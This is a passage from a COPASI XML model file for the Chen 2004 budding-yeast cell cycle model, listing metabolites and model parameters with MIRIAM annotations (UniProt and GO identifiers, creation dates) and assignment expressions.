<MiriamAnnotation>
<rdf:RDF xmlns:CopasiMT="http://www.copasi.org/RDF/MiriamTerms#" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Metabolite_125">
<CopasiMT:is rdf:resource="urn:miriam:uniprot:P47035" />
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</Metabolite>
<Metabolite key="Metabolite_127" name="NET1T" simulationType="assignment" compartment="Compartment_3">
<MiriamAnnotation>
<rdf:RDF xmlns:CopasiMT="http://www.copasi.org/RDF/MiriamTerms#" xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Metabolite_127">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2010-08-05T16:23:47Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
<CopasiMT:is rdf:resource="urn:miriam:uniprot:P47035" />
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<Expression>
(<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[NET1],Reference=ParticleNumber>/<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[amount to particle factor],Reference=Value>+<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[NET1P],Reference=ParticleNumber>/<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[amount to particle factor],Reference=Value>+<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[RENT],Reference=ParticleNumber>/<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[amount to particle factor],Reference=Value>+<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[RENTP],Reference=ParticleNumber>/<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[amount to particle factor],Reference=Value>)/<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Reference=Volume>
</Expression>
</Metabolite>
<Metabolite key="Metabolite_129" name="ORI" simulationType="reactions" compartment="Compartment_3">
<MiriamAnnotation>
<rdf:RDF xmlns:CopasiMT="http://www.copasi.org/RDF/MiriamTerms#" xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Metabolite_129">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2010-03-16T14:24:37Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
<CopasiMT:is rdf:resource="urn:miriam:obo.go:GO%3A0006261" />
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</Metabolite>
<Metabolite key="Metabolite_131" name="PDS1" simulationType="reactions" compartment="Compartment_3">
<MiriamAnnotation>
<rdf:RDF xmlns:CopasiMT="http://www.copasi.org/RDF/MiriamTerms#" xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Metabolite_131">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2010-08-05T16:23:51Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
<CopasiMT:is rdf:resource="urn:miriam:uniprot:P40316" />
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</Metabolite>
<Metabolite key="Metabolite_133" name="PE" simulationType="assignment" compartment="Compartment_3">
<MiriamAnnotation>
<rdf:RDF xmlns:CopasiMT="http://www.copasi.org/RDF/MiriamTerms#" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Metabolite_133">
<CopasiMT:is rdf:resource="urn:miriam:uniprot:Q03018" />
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<Expression>
(<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[ESP1T],Reference=Value>-<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[ESP1],Reference=ParticleNumber>/<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[amount to particle factor],Reference=Value>)/<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Reference=Volume>
</Expression>
</Metabolite>
<Metabolite key="Metabolite_135" name="PPX" simulationType="reactions" compartment="Compartment_3">
<MiriamAnnotation>
<rdf:RDF xmlns:CopasiMT="http://www.copasi.org/RDF/MiriamTerms#" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Metabolite_135">
<CopasiMT:is rdf:resource="urn:miriam:uniprot:P38698" />
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</Metabolite>
<Metabolite key="Metabolite_137" name="RENT" simulationType="reactions" compartment="Compartment_3">
<MiriamAnnotation>
<rdf:RDF xmlns:CopasiMT="http://www.copasi.org/RDF/MiriamTerms#" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Metabolite_137">
<CopasiMT:hasPart>
<rdf:Bag>
<rdf:li rdf:resource="urn:miriam:uniprot:P06700" />
<rdf:li rdf:resource="urn:miriam:uniprot:P47035" />
<rdf:li rdf:resource="urn:miriam:uniprot:Q00684" />
</rdf:Bag>
</CopasiMT:hasPart>
<CopasiMT:is rdf:resource="urn:miriam:obo.go:GO%3A0030869" />
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</Metabolite>
<Metabolite key="Metabolite_139" name="RENTP" simulationType="reactions" compartment="Compartment_3">
<MiriamAnnotation>
<rdf:RDF xmlns:CopasiMT="http://www.copasi.org/RDF/MiriamTerms#" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Metabolite_139">
<CopasiMT:hasPart>
<rdf:Bag>
<rdf:li rdf:resource="urn:miriam:uniprot:P06700" />
<rdf:li rdf:resource="urn:miriam:uniprot:P47035" />
<rdf:li rdf:resource="urn:miriam:uniprot:Q00684" />
</rdf:Bag>
</CopasiMT:hasPart>
<CopasiMT:is rdf:resource="urn:miriam:obo.go:GO%3A0030869" />
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</Metabolite>
<Metabolite key="Metabolite_141" name="SBF" simulationType="assignment" compartment="Compartment_3">
<MiriamAnnotation>
<rdf:RDF xmlns:CopasiMT="http://www.copasi.org/RDF/MiriamTerms#" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Metabolite_141">
<CopasiMT:is rdf:resource="urn:miriam:uniprot:P11938" />
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<Expression>
GK(<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[Vasbf],Reference=Value>,<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[Visbf],Reference=Value>,<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[Jasbf],Reference=Value>,<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[Jisbf],Reference=Value>)/<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Reference=Volume>
</Expression>
</Metabolite>
<Metabolite key="Metabolite_143" name="SIC1" simulationType="reactions" compartment="Compartment_3">
<MiriamAnnotation>
<rdf:RDF xmlns:CopasiMT="http://www.copasi.org/RDF/MiriamTerms#" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Metabolite_143">
<CopasiMT:is rdf:resource="urn:miriam:uniprot:P38634" />
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</Metabolite>
<Metabolite key="Metabolite_145" name="SIC1P" simulationType="reactions" compartment="Compartment_3">
<MiriamAnnotation>
<rdf:RDF xmlns:CopasiMT="http://www.copasi.org/RDF/MiriamTerms#" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Metabolite_145">
<CopasiMT:is rdf:resource="urn:miriam:uniprot:P38634" />
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</Metabolite>
<Metabolite key="Metabolite_147" name="SIC1T" simulationType="assignment" compartment="Compartment_3">
<MiriamAnnotation>
<rdf:RDF xmlns:CopasiMT="http://www.copasi.org/RDF/MiriamTerms#" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Metabolite_147">
<CopasiMT:is rdf:resource="urn:miriam:uniprot:P38634" />
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<Expression>
(<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[SIC1],Reference=ParticleNumber>/<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[amount to particle factor],Reference=Value>+<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[C2],Reference=ParticleNumber>/<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[amount to particle factor],Reference=Value>+<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[C5],Reference=ParticleNumber>/<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[amount to particle factor],Reference=Value>+<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[SIC1P],Reference=ParticleNumber>/<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[amount to particle factor],Reference=Value>+<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[C2P],Reference=ParticleNumber>/<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[amount to particle factor],Reference=Value>+<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[C5P],Reference=ParticleNumber>/<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[amount to particle factor],Reference=Value>)/<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Reference=Volume>
</Expression>
</Metabolite>
<Metabolite key="Metabolite_149" name="SPN" simulationType="reactions" compartment="Compartment_3">
<MiriamAnnotation>
<rdf:RDF xmlns:CopasiMT="http://www.copasi.org/RDF/MiriamTerms#" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Metabolite_149">
<CopasiMT:is rdf:resource="urn:miriam:obo.go:GO%3A0051225" />
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</Metabolite>
<Metabolite key="Metabolite_151" name="SWI5" simulationType="reactions" compartment="Compartment_3">
<MiriamAnnotation>
<rdf:RDF xmlns:CopasiMT="http://www.copasi.org/RDF/MiriamTerms#" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Metabolite_151">
<CopasiMT:is rdf:resource="urn:miriam:uniprot:P08153" />
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</Metabolite>
<Metabolite key="Metabolite_153" name="SWI5P" simulationType="reactions" compartment="Compartment_3">
<MiriamAnnotation>
<rdf:RDF xmlns:CopasiMT="http://www.copasi.org/RDF/MiriamTerms#" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Metabolite_153">
<CopasiMT:is rdf:resource="urn:miriam:uniprot:P08153" />
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</Metabolite>
<Metabolite key="Metabolite_155" name="TEM1GDP" simulationType="assignment" compartment="Compartment_3">
<MiriamAnnotation>
<rdf:RDF xmlns:CopasiMT="http://www.copasi.org/RDF/MiriamTerms#" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Metabolite_155">
<CopasiMT:is rdf:resource="urn:miriam:uniprot:P38987" />
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<Expression>
(<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[TEM1T],Reference=Value>-<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[TEM1GTP],Reference=ParticleNumber>/<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[amount to particle factor],Reference=Value>)/<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Reference=Volume>
</Expression>
</Metabolite>
<Metabolite key="Metabolite_157" name="TEM1GTP" simulationType="reactions" compartment="Compartment_3">
<MiriamAnnotation>
<rdf:RDF xmlns:CopasiMT="http://www.copasi.org/RDF/MiriamTerms#" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Metabolite_157">
<CopasiMT:is rdf:resource="urn:miriam:uniprot:P38987" />
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</Metabolite>
<Metabolite key="Metabolite_159" name="GLU" simulationType="fixed" compartment="Compartment_3">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Metabolite_159">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2010-05-07T14:54:29Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</Metabolite>
</ListOfMetabolites>
<ListOfModelValues>
<ModelValue key="ModelValue_6" name="b0" simulationType="fixed">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#ModelValue_6">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2010-08-05T15:30:02Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</ModelValue>
<ModelValue key="ModelValue_5" name="bub2h" simulationType="fixed">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#ModelValue_5">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2010-08-05T15:30:03Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</ModelValue>
<ModelValue key="ModelValue_11" name="bub2l" simulationType="fixed">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#ModelValue_11">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2010-08-05T15:30:04Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</ModelValue>
<ModelValue key="ModelValue_12" name="C0" simulationType="fixed">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#ModelValue_12">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2010-08-05T15:17:43Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</ModelValue>
<ModelValue key="ModelValue_13" name="CDC15T" simulationType="fixed">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#ModelValue_13">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2010-08-05T15:17:44Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</ModelValue>
<ModelValue key="ModelValue_14" name="Dn3" simulationType="fixed">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#ModelValue_14">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2010-08-05T10:53:57Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</ModelValue>
<ModelValue key="ModelValue_15" name="ebudb5" simulationType="fixed">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#ModelValue_15">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2010-08-05T15:30:04Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</ModelValue>
<ModelValue key="ModelValue_16" name="ebudn2" simulationType="fixed">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#ModelValue_16">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2010-08-05T15:30:05Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</ModelValue>
<ModelValue key="ModelValue_17" name="ebudn3" simulationType="fixed">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#ModelValue_17">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2010-08-05T15:30:05Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</ModelValue>
<ModelValue key="ModelValue_18" name="ec1b2" simulationType="fixed">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#ModelValue_18">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2010-08-05T15:30:07Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</ModelValue>
<ModelValue key="ModelValue_19" name="ec1b5" simulationType="fixed">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#ModelValue_19">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2010-08-05T15:30:07Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</ModelValue>
<ModelValue key="ModelValue_20" name="ec1k2" simulationType="fixed">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#ModelValue_20">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2010-08-05T15:30:08Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</ModelValue>
<ModelValue key="ModelValue_21" name="ec1n2" simulationType="fixed">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#ModelValue_21">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2010-08-05T15:30:09Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</ModelValue>
<ModelValue key="ModelValue_22" name="ec1n3" simulationType="fixed">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#ModelValue_22">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2010-08-05T15:30:11Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</ModelValue>
<ModelValue key="ModelValue_23" name="ef6b2" simulationType="fixed">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#ModelValue_23">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2010-08-05T15:30:12Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</ModelValue>
<ModelValue key="ModelValue_24" name="ef6b5" simulationType="fixed">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#ModelValue_24">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2010-08-05T15:30:12Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</ModelValue>
<ModelValue key="ModelValue_25" name="ef6k2" simulationType="fixed">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#ModelValue_25">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2010-08-05T15:30:13Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</ModelValue>
<ModelValue key="ModelValue_26" name="ef6n2" simulationType="fixed">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#ModelValue_26">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2010-08-05T15:30:14Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</ModelValue>
<ModelValue key="ModelValue_27" name="ef6n3" simulationType="fixed">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#ModelValue_27">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2010-08-05T15:30:14Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</ModelValue>
<ModelValue key="ModelValue_28" name="eicdhb2" simulationType="fixed">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#ModelValue_28">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2010-08-05T15:30:15Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</ModelValue>
<ModelValue key="ModelValue_29" name="eicdhb5" simulationType="fixed">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#ModelValue_29">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2010-08-05T15:30:16Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</ModelValue>
<ModelValue key="ModelValue_30" name="eicdhn2" simulationType="fixed">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#ModelValue_30">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2010-05-07T16:15:17Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</ModelValue>
<ModelValue key="ModelValue_31" name="eicdhn3" simulationType="fixed">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#ModelValue_31">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2010-08-05T15:30:17Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</ModelValue>
<ModelValue key="ModelValue_32" name="eorib2" simulationType="fixed">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#ModelValue_32">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2010-08-05T15:30:18Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</ModelValue>
<ModelValue key="ModelValue_33" name="eorib5" simulationType="fixed">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#ModelValue_33">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2010-08-05T15:30:19Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</ModelValue>
<ModelValue key="ModelValue_34" name="esbfb5" simulationType="fixed">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#ModelValue_34">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2010-08-05T15:30:20Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</ModelValue>
<ModelValue key="ModelValue_35" name="esbfn2" simulationType="fixed">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#ModelValue_35">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2010-08-05T15:30:20Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</ModelValue>
<ModelValue key="ModelValue_36" name="esbfn3" simulationType="fixed">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#ModelValue_36">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2010-08-05T15:30:21Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</ModelValue>
<ModelValue key="ModelValue_37" name="ESP1T" simulationType="fixed">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#ModelValue_37">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2010-08-05T15:18:07Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</ModelValue>
<ModelValue key="ModelValue_38" name="IET" simulationType="fixed">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#ModelValue_38">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2010-08-05T15:28:32Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</ModelValue>
<ModelValue key="ModelValue_39" name="J20ppx" simulationType="fixed">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#ModelValue_39">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2010-08-05T15:28:36Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</ModelValue>
<ModelValue key="ModelValue_40" name="Jacdh" simulationType="fixed">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#ModelValue_40">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2010-08-05T15:28:36Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
